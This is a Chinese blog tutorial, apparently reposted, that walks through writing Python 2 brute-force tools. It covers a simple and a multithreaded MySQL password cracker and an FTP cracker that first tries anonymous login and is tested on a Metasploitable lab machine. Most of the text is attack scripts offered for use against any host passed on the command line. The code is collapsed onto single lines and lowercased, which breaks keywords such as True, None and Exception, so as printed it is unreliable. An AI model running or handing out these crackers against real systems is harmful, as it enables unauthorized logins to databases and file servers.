Python开发爆破工具
程序员文章站
2022-05-14 11:01:08
上一篇讲到了如何用Python开发字典,而当我们手里有了字典 就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写 接下来我就要一步一步来写爆破工具! 爆破MySQL: 想要爆破MySQL目标至少要允许远程连接 我这里没有开启远程连接,只是爆破本地的MySQL 实际上,如果掌握了如何爆破 ......
上一篇讲到了如何用python开发字典,而当我们手里有了字典
就可以进一步去做爆破的任务了,可以用现成的工具,当然也可以自己写
接下来我就要一步一步来写爆破工具!
爆破mysql:
想要爆破mysql目标至少要允许远程连接
我这里没有开启远程连接,只是爆破本地的mysql
实际上,如果掌握了如何爆破本地mysql,那么想要远程爆破mysql也是很轻松的
最基本的实现:
# -*-coding:utf-8 -*- import pymysql mysql_username = ('root', 'test', 'admin', 'user') mysql_password = ('', '123456', 'test', 'root', 'admin', 'xuyiqing', 'user') success = false host = "127.0.0.1" port = 3306 for username in mysql_username: for password in mysql_password: try: db = pymysql.connect(host, username, password) success = true if success: print "用户名:" + username + " 密码:" + password + " 破解成功" except exception, e: print "用户名:" + username + " 密码:" + password + " 破解失败" pass
固定好哪些用户名和哪些密码,以及爆破的ip和端口,直接执行即可
进阶的mysql爆破脚本:写的很完整,支持多线程
# -*-coding:utf-8 -*- """ mysql爆破脚本 用法: python mysqlcrack2.py -h [目标ip] --u [用户字典] --p [密码字典] -p [端口] """ import re import socket import optparse import threading try: import pymysql except importerror: print "[!] you need to install pymysql module!" print "[!] usage:pip install pymysql" exit() result_user = none result_pass = none threads = [] def main(): """ 处理输入参数 :return:none """ print "welcome to mysqlcrack2" print "author: xuyiqing version:1.0" parse = optparse.optionparser( 'python %prog -h <target host> --u <users dictionary> --p <password dictionary> -p <port>') parse.add_option('-h', dest="target_host", type="string", help='specify the host') parse.add_option('--u', dest='user_dic', type='string', help='specify the dictionary for user') parse.add_option('--p', dest='pwd_dic', type='string', help='specify the dictionary for passwords') parse.add_option('-p', dest='port', type='int', help='specify the port') (options, args) = parse.parse_args() target_host = options.target_host user_dic = options.user_dic pwd_dic = options.pwd_dic port = options.port if target_host is not none and re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', target_host): mysql_brute(target_host, user_dic, pwd_dic, port) else: print "[!] unknown ip\n" exit() def mysql_brute(host, user_dic, pwd_dic, port): """ mysql暴力破解 :param host: 主机 :param user_dic: 用户字典 :param pwd_dic: 密码字典 :param port: 端口 :return: none """ print "[*] target:" + host print "[*] start cracking" userlist = none pwdlist = none try: socket.gethostbyname(host) except exception: print '[*] cannot connect to %s' % host exit() try: userlist = [i.strip('\n') for i in open(user_dic, 'r').readlines()] pwdlist = [j.strip('\n') for j in open(pwd_dic, 'r').readlines()] print "[*] number of users:" + str(len(userlist)) print "[*] number of passwords:" + str(len(pwdlist)) except exception: print "[!] the path of the dictionary file is incorrect" exit() global threads for user in userlist: for pwd in pwdlist: t = threading.thread(target=mysql_login, args=(host, user, pwd, port)) t.start() threads.append(t) def mysql_login(host, username, password, port): """ mysql连接 :param host:主机 :param username:用户名 :param password: 密码 :param port: 端口 :return: none """ try: db = pymysql.connect(host=host, port=port, user=username, passwd=password) print "[+] success! user:" + username + " password:" + password + "\n" global result_user, result_pass result_user = username result_pass = password db.close() exit() except exception: print "[-] fail! user:" + username + " password:" + password + "\n" if __name__ == '__main__': main() for thread in threads: thread.join() if result_user is not none and result_pass is not none: print "[+] result: %s - %s" % (result_user, result_pass) if result_user is none and result_pass is none: print "[+] crack fail"
ftp破解工具开发:
实际去安装一些ftp软件比较困难,我这里就用metasploitable linux
启动后默认开启ftp服务,我这里的ip是192.168.232.129
metaploitable linux的ftp可以匿名登陆,并且已知一个账号密码为:msfadmin-msfadmin
# -*-coding:utf-8 -*- import optparse import ftplib import threading import socket def anony_login(host): """ ftp匿名登陆 :param host:主机 :return: none """ try: ftp = ftplib.ftp(host) ftp.connect(host, 21, timeout=10) ftp.login('anonymous', 'test@qq.com') ftp.retrlines('list') ftp.quit() print "\n[*]" + str(host) + " ftp anonymous login success" except exception: print "\n[-]" + str(host) + " ftp anonymous login fail" def ftp_login(host, username, password): """ 尝试用户密码登陆ftp :param host:主机 :param username:用户名 :param password:密码 :return:none """ try: print "[-] trying: " + username + "-" + password + "\n" ftp = ftplib.ftp(host) ftp.connect(host, 21, timeout=10) ftp.login(username, password) ftp.retrlines("list") ftp.quit() print "success! " + username + " - " + password except ftplib.all_errors: pass def brute_force(host, users_file, pwds_file): """ 暴力破解 :param host: 主机 :param users_file:用户字典 :param pwds_file: 密码字典 :return: none """ users_f = open(users_file, 'r') pwds_f = open(pwds_file, 'r') for user in users_f.readlines(): pwds_f.seek(0) for password in pwds_f.readlines(): username = user.strip('\n') password = password.strip('\n') t = threading.thread(target=ftp_login, args=(host, username, password)) t.start() def main(): """ 主函数,处理输入参数 :return:none """ parser = optparse.optionparser('usage%prog -h <target host> -u <users dictionary> -p <password dictionary>') parser.add_option('-h', dest='target_host', type='string', help='specify the host') parser.add_option('-u', dest='user_dic', type='string', help='specify the dictionary for user') parser.add_option('-p', dest='pwd_dic', type='string', help='specify the dictionary for passwords') (options, args) = parser.parse_args() host = options.target_host user_dic = options.user_dic pwd_dic = options.pwd_dic try: socket.gethostbyname(host) except exception: print '[*] cannot resolve %s unknown host' % host exit() anony_login(host) brute_force(host, user_dic, pwd_dic) if __name__ == '__main__': main()
使用的话,需要两个字典:用户字典和密码字典,我随便加入一些东西
username.txt
root user admin msfadmin manager
password.txt
pwd password userpass msfadmin manager 123456
实际使用:-h 输入ip -u 用户名字典 -p 密码字典
结果:上边已经找到匿名登陆,还有下图的msfadmin,说明破解成功了
上一篇: Python练手例子(1)
下一篇: 老哥你这衣服很有内涵啊